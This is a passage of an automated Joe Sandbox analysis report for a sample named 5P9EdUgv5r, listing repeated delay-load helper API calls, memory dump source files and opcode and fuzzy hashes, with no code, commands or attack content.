                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                                • Instruction ID: edf5d0a094b3638d0fd460bbf4c3e91741024b17bf8aab8398e6d8b9aee3ef46
                                • Opcode Fuzzy Hash: 0e84b1d713b0c744031e0cc3a7827f802c819dfb7d85fdfee34ab13ea8a49be3
                                • Instruction Fuzzy Hash: 50B0929526C1066D220811002D07D36223ED880B20321822FB00E90040A9408C489031
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                                • Instruction ID: 4025da67312c593f7d381bd3aa07bfa54e7a3d79a4c5df0a5cae3ad06867dfb4
                                • Opcode Fuzzy Hash: 27bceade0eb06da74272bbac1c220392376dcdb85b6e2ce008800546cf4751a3
                                • Instruction Fuzzy Hash: 94B0129536C0436D320C51043E07E37233ECCC0B20331C11FF10EC1140F9808C099031
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7D8A3
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                                • Instruction ID: f42ab689df07a9c2a4ed69fa053db8c31c255454de152063c94eb6faea77e4d9
                                • Opcode Fuzzy Hash: 9885076e69593478a829639715e4f92276f556196b43cfe6923f2386d8990278
                                • Instruction Fuzzy Hash: 3FA001A66AD542BC36087651BE57D3A6A2ECCC5B61331C91EF48FA41C1B980A8499832
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: ef2cbe02d1b2f696037cddc1ba1447e4b2d15f59a8c8827e60edf66deb99c147
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: 1078d6d5011643acaf854546851db0626e0bac1552b08bcb558fd1064b1084ca
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: f56d0e0bdfb28a8b8a76763641d67d84c85bfb11b2575450d04cb32f5cf08be6
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: faf720d5f6dec265e0b7b04c862e9e990cd10ed3e307133750fcdc2f363440f9
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                                • Instruction ID: ea6b2818e90efd4b55c7cc48b84744ad7c7bce59d936578a31223e56aa754f42
                                • Opcode Fuzzy Hash: 6eb03a8f1a15fc6dacb98d26da816a242bfa4af5d237fef015f0f52d4baeacec
                                • Instruction Fuzzy Hash: 99A001A62AD142BC36087252BE17D3A626EDDD4B61331CA1FF44F94089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DAB2
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                                • Instruction ID: c86d836922df9aefbc7272a78cf5fb7050dc04edf516b90c24bd539397434eb7
                                • Opcode Fuzzy Hash: c35fd1e22c275ec1c70660fcde8ab73f9c6f39ed66feb0e4a3e44d55fa9121db
                                • Instruction Fuzzy Hash: 3FA001A62AD5427C3648B252BE17D3A626EEDE0B22331C61FF44FA4089B99898495871
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 6e9445d7c14bd4694a576f09e597403ae79e3a8c2c7e312bb5b6a816962cc16d
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                                • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                                • Opcode Fuzzy Hash: d4f5c3605a2abceadab8a3fce1f7a77e089bec96884387fc6160ea05dd26eda4
                                • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DC36
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                                • Instruction ID: 28a459b9f2ae1a7ea9180c775af80d0dbea568ceb68a0be06f6a4f5d98dc951b
                                • Opcode Fuzzy Hash: 5de647e9cff412ea570b7e863885aa4ca6820cf663a1eda950b05da65c465485
                                • Instruction Fuzzy Hash: 4FA001AA6AD242BD360D62517E17D7A623ECCC8B61335C91EF54FA4095BA80AC499431
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 813955f0469fc2b4a24177dbfa7fa89412b55bd961709e5e15bba3e01a56269b
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: c6c5ea55a16342289fd238fd73ad6db2d79998c5d5e255509b14990d1a3d7679
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                APIs
                                • ___delayLoadHelper2@8.DELAYIMP ref: 00D7DBD5
                                  • Part of subcall function 00D7DF59: DloadReleaseSectionWriteAccess.DELAYIMP ref: 00D7DFD6
                                  • Part of subcall function 00D7DF59: RaiseException.KERNEL32(C06D0057,00000000,00000001,?), ref: 00D7DFE7
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: AccessDloadExceptionHelper2@8LoadRaiseReleaseSectionWrite___delay
                                • String ID:
                                • API String ID: 1269201914-0
                                • Opcode ID: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                                • Instruction ID: 756f11e2614d29acfbd3bdd2d121d123fcb9c9246b1902b4a975ccecbc0e88c5
                                • Opcode Fuzzy Hash: 92b3299889a9e28d25bf0931f87ab6960e8987780b6219144b8390bba16e929d
                                • Instruction Fuzzy Hash: E3A011AA2AC002BC320822003E0BC3A223ECCC0B20332C80FF00F80080BA808C088030
                                APIs
                                • SetEndOfFile.KERNELBASE(?,00D69104,?,?,-00001964), ref: 00D69EC2
                                Memory Dump Source
                                • Source File: 00000000.00000002.1633751414.0000000000D61000.00000020.00000001.01000000.00000003.sdmp, Offset: 00D60000, based on PE: true
                                 • Associated: 00000000.00000002.1633739832.0000000000D60000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633798451.0000000000D93000.00000002.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000D9E000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DA4000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633810982.0000000000DC1000.00000004.00000001.01000000.00000003.sdmp
                                 • Associated: 00000000.00000002.1633847058.0000000000DC2000.00000002.00000001.01000000.00000003.sdmp
                                Joe Sandbox IDA Plugin
                                • Snapshot File: hcaresult_0_2_d60000_5P9EdUgv5r.jbxd
                                Similarity
                                • API ID: File
                                • String ID:
                                • API String ID: 749574446-0
